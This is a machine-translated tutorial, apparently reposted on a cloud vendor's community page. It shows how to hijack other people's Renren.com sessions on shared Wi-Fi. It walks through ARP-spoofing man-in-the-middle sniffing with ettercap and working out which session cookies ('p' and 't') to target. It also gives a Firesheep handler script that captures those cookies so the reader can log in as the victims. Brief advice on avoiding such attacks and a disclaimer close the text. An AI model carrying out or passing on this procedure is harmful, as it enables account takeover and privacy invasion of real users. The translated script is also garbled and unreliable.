Use firesheep to hijack renren.com.

Source: Internet
Author: User
Tags firesheep

I. first introduce the hijacking principle:

Web verification is usually divided into the following steps, as is the case in school:

1. log on to Renren.com, enter your username and password, and click log on.

2. The server verifies the ID and password you submitted, and then returns some unique cookies to your browser.

3. When you view others' pages, the browser will first send a cookie to indicate your identity to the server.

4. The server completes cookie verification to complete the expected action.

 

The steps are perfect, but there is an underlying problem, that is, whether the communication between the user and the server is encrypted. If not, the third party can easily intercept user data packets, disguise as a real user communicating with the server.

In the Internet, security is a piece of shit.

1. the most basic requirement is that the website should switch to https for user login pages. At this time, the user name and password you submit will be encrypted and transmitted to the server, even if someone intercepts your data packet, they will not be able to see your username and password. but Renren does not. The user name and password you entered are sent to the server in plain text. If you don't believe it, you can find a packet capture software.

2. encryption is not only required for user login, but also for sending cookies. before firesheep was released, even Google and Facebook did not. let alone Renren .... in this way, by intercepting others' cookies, you can directly log on to others' schools. this is the process described in this article.

 

There is a natural question: how can someone else get my data packets when I access the Internet? If you use a wired network, it is certainly not a problem. However, in many cases, you use a wireless router to access the Internet. During the work process, the wireless router will distribute the data packets to the entire space, any network adapter can obtain the data. this leaves some people with a chance. under normal circumstances, the network adapter will lose data packets that do not belong to itself. however, special software can be used to save the data packets that should be sent to others, and relevant private data can be analyzed. A common tool is pcap, which is called Winpcap in windows.

 

In this way, the principle is clear: first, the pcap tool is used to intercept others' packets, and then the cookie of others' networks is analyzed. Then, the system directly logs on to others' networks. the user name and password do not need to be known throughout the process.

 

II. Environment Description:

Ubuntu10.10 firefox3.6 chrome10 firesheep ettercap

 

Explanation: Because Windows encapsulates NICs, packet capture is not as powerful as Linux and Mac. I first failed to experiment on Windows 7.

Firesheep is a plug-in of Firefox. You need to install Firefox.

Chrome is used to analyze website cookie information.

Firesheep is the main force, the installation in ubuntu10.10 please refer to the http://blog.csdn.net/anchor89/archive/2011/04/04/6301948.aspx

Ettercap: the software used to capture packets. The installation method is also in the above link.

 

3. steps:

1. Analyze the cookie of Renren.com

Open chrome and install the plug-in named edit this cookie. then log on to your Renren account and click the edit this cookie icon to view the cookie content that Renren.com returns to you. delete these cookies one by one and record them. Refresh the page every time you delete them until you are prompted to log on again after a refresh. this indicates that the cookies used for identity authentication have been deleted and re-tested in the deleted cookies until you determine which one is used for identity authentication. note that there may be more than one identity verification, which requires more complex pairing tests.

In the end, we found that Renren.com has two cookies for identity authentication, namely P and T.

Chrome can be disabled.

 

2. Configure firesheep script

Open Firefox, open the firesheep configuration page, find the website tab, and click Add to add a new project named Renren. Double-click it to display a JS editing page.

Replace the content with the following script:

Register ({<br/> // For http://www.renren.com/<br/> name: 'renren. com ', // The name that will show up in the firesheep sidebar <br/> URL: 'http: // www.renren.com /', // The website URL that firesheep will match on <br/> domains: ['renren. com '], // The actual domain that firesheep will look for in the request <br/> sessioncookienames: ['P', 't'], // a list of cookie key names that firesheep will intercept and send on <br/> // your behalf (this shocould be the list of cookies you noted in the previous step) <br/> identifyuser: function () {// firesheep can make a request to discover some information about the cookie (username and Avatar) for the Buddy List <br/> var site = This. httpget (this. siteurl); // This will pull down a page that contains the value for the username and Avatar <br/> This. username = site. body. queryselector ('a. name '). innerhtml; // use a query selector to pull out the username from the page (optional) <br/> // This. useravatar = resp. body. queryselector ('div. figure '). SRC; // another query selector to grab the image (optional) <br/>}< br/> }); 

Identifyuser: function () is used to configure cookies, set URLs, and so on. These operations are essential.

The values of this. username and this. useravastar in the identifyuser: function () are used to set the account name and Avatar corresponding to the cookie to be captured. Directly commenting out the account name and profile does not affect the work.

 

Close after replacement.

 

3. Set ettercap

Open a terminal and enter

Sudo ettercap-G 

Run the following menu commands in sequence:

Sniffing> uniied sniffing

Hosts> scan hosts

At this time, the software will search for hosts under the same network segment, and continue to execute after the search is complete:

Hosts> host list

In the list, set the router address to target 1, the router address is usually 192.168.1.1, and Target 2 does not need to be set (according to my experiment, it doesn't matter if neither target 1 nor 2 is set)

Check mitm> ARP xxxxxx> remote connection

Start> Start

At this point, the network card starts to capture packets.

 

4. Use firesheep

Open Firefox (if you have just disabled it), click Ctrl + Shift + S to open the firesheep sidebar, click the start button, and then wait. if firesheep detects that someone has logged on to Renren.com, it will be automatically displayed on the sidebar. You only need to double-click the corresponding icon to directly log on to the renren.com.

 

5. How to prevent others from logging on to your account?

Do not log on to your on-campus or other accounts in the hot spots provided by Starbucks, because the hot spots in these places are not encrypted, and anyone with a bad track can easily intercept others' data packets.

Public Wireless routing in the dormitory should also be careful when accessing the Internet. It is okay to use wired routing.

If you connect to a wireless network and then use VPN or other methods to access the Internet, you don't have to worry, because the VPN itself is encrypted.

 

======================================

This article is only for technical exchanges. Do not use the Internet to engage in illegal activities. We also hope that Internet companies can improve these vulnerabilities as soon as possible to create a secure and carefree network environment for Internet users.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.